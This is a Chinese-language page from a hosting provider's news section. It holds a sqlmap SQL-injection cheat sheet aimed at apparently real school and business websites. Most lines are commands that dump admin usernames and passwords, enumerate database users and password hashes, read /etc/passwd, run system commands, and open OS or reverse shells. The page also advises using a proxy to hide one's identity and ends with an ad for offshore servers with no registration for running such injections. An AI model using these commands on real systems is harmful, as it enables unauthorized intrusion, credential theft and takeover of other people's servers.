新聞資訊
行業(yè)資訊
sqlmap post注入案例 sqlmap常用指令和參數(shù)
2018-01-08 11:42:39
摘要:sqlmap post注入案例 sqlmap常用指令和參數(shù)

檢查注入點(diǎn)

sqlmap.py -u "http://www.scshlx.com/TeachView.asp?id=21"

列數(shù)據(jù)庫(kù)信息

sqlmap -u? "http://www.scshlx.com/TeachView.asp?id=21" --dbs

指定庫(kù)名列出所有表 //最大搜索線程為10

sqlmap.py -u "http://www.hainanez.com/TeachView.asp?id=33" --tables

指定庫(kù)名表名列出所有字段

sqlmap.py -u "http://www.hainanez.com/TeachView.asp?id=33"? -T "雙引號(hào)下為指定表名admin" --columns

指定庫(kù)名表名字段名dump出指定字段的內(nèi)容

sqlmap -u "http://ooxx.com.tw/star_photo.php?artist_id=11" --dump -T "admin" -C "username,password"

查詢表名下所有字段

sqlmap.py -u "http://www.hainanez.com/TeachView.asp?id=33" --tables --columns

Mysql注入(有多個(gè)庫(kù) 必須找到有管理員的數(shù)據(jù)庫(kù))

--is-dba? 當(dāng)前用戶權(quán)限

--dbs? 所有數(shù)據(jù)庫(kù)

--current-db? ?網(wǎng)站當(dāng)前數(shù)據(jù)庫(kù)

--users? 所有數(shù)據(jù)庫(kù)用戶

--current-user? ?當(dāng)前數(shù)據(jù)庫(kù)用戶

--tables-D"當(dāng)前數(shù)據(jù)庫(kù)名字"? 查表名、

-T"指定的表名"-D"當(dāng)前數(shù)據(jù)庫(kù)名字"--columns 查字段

Cookie注入(遇到防注入)

sqlmap.py -u "http://www.scshlx.com/TeachView.asp" --cookie"id=21"--level 2? ?

列表名等 在上方代碼后面加--tables等;??

?eg:sqlmap.py -u "http://www.hexuan.com/shownews.asp" --cookie "id=1749" --level 2 --dump -T "admin" -C "username"

有幾個(gè)參數(shù)可能會(huì)用到,直接加在最后面就可以了,更多詳細(xì)參數(shù)見官方文檔:

–cookie=COOKIE在需要登錄的地方,需要登錄后的cookie

–proxy=”http://127.0.0.1:8087″? ?使用HTTP代理隱藏自己的身份,比如使用goagent等

–sql-query=QUERY? 執(zhí)行一個(gè)sql語(yǔ)句,不一定支持

sqlmap -u “http://url/news?id=1″ --dbms “Mysql” –users # dbms 指定數(shù) 據(jù)庫(kù)類型

sqlmap -u “http://url/news?id=1″ -- users 列數(shù)據(jù)庫(kù)用戶

sqlmap -u “http://url/news?id=1″ -- dbs? ?列數(shù)據(jù)庫(kù)

sqlmap -u “http://url/news?id=1″ -- passwords 數(shù)據(jù)庫(kù)用戶密碼

sqlmap -u “http://url/news?id=1″ -- passwords-U root -v 0 #列出指定用戶 數(shù)據(jù)庫(kù)密碼

sqlmap? -u? “http://url/news?id=1″? ?-- dump? -C? “password,user,id”? -T “tablename”-D “db_name”

–start 1 –stop 20 #列出指定字段,列出20 條

sqlmap -u “http://url/news?id=1″ -- dump-all -v 0 #列出所有數(shù)據(jù)庫(kù)所有表

sqlmap -u “http://url/news?id=1″ -- privileges #查看權(quán)限

sqlmap -u “http://url/news?id=1″ -- privileges -U root #查看指定用戶權(quán)限sqlmap -u “http://url/news?id=1″ –is-dba -v 1 #是否是數(shù)據(jù)庫(kù)管理員sqlmap -u “http://url/news?id=1″ –roles #枚舉數(shù)據(jù)庫(kù)用戶角色

sqlmap -u “http://url/news?id=1″ -- udf-inject #導(dǎo)入用戶自定義函數(shù)(獲取 系統(tǒng)權(quán)限!)

sqlmap -u “http://url/news?id=1″ -- dump-all –exclude-sysdbs -v 0 #列 出當(dāng)前庫(kù)所有表

sqlmap -u “http://url/news?id=1″ -- union-cols #union 查詢表記錄

sqlmap -u “http://url/news?id=1″ -- cookie “COOKIE_VALUE”#cookie注入

sqlmap -u “http://url/news?id=1″ -- b #獲取banner信息

sqlmap -u “http://url/news?id=1″ -- data “id=3″#post注入

sqlmap -u “http://url/news?id=1″ - v 1 -f #指紋判別數(shù)據(jù)庫(kù)類型

sqlmap -u “http://url/news?id=1″ -- proxy“http://127.0.0.1:8118” #代理注 入

sqlmap -u “http://url/news?id=1″ -- string”STRING_ON_TRUE_PAGE”# 指 定關(guān)鍵詞

sqlmap -u “http://url/news?id=1″ -- sql-shell #執(zhí)行指定sql命令

sqlmap -u “http://url/news?id=1″ -- file /etc/passwd

sqlmap -u “http://url/news?id=1″ -- os-cmd=whoami #執(zhí)行系統(tǒng)命令

sqlmap -u “http://url/news?id=1″ -- os-shell #系統(tǒng)交互shell?

sqlmap -u “http://url/news?id=1″ –os-pwn #反彈shell

sqlmap -u “http://url/news?id=1″ -- reg-read #讀取win系統(tǒng)注冊(cè)表

sqlmap -u “http://url/news?id=1″ -- dbs-o “sqlmap.log”#保存進(jìn)度

sqlmap -u “http://url/news?id=1″ -- dbs -o “sqlmap.log” –resume #恢復(fù) 已保存進(jìn)度


USA-IDC海外服務(wù)器支持sqlmap post注入,歡迎廣大用戶聯(lián)系24小時(shí)在線客服租用

USA-IDC為您提供免備案服務(wù)器 0元試用
立即聯(lián)系在線客服,即可申請(qǐng)免費(fèi)產(chǎn)品試用服務(wù)
立即申請(qǐng)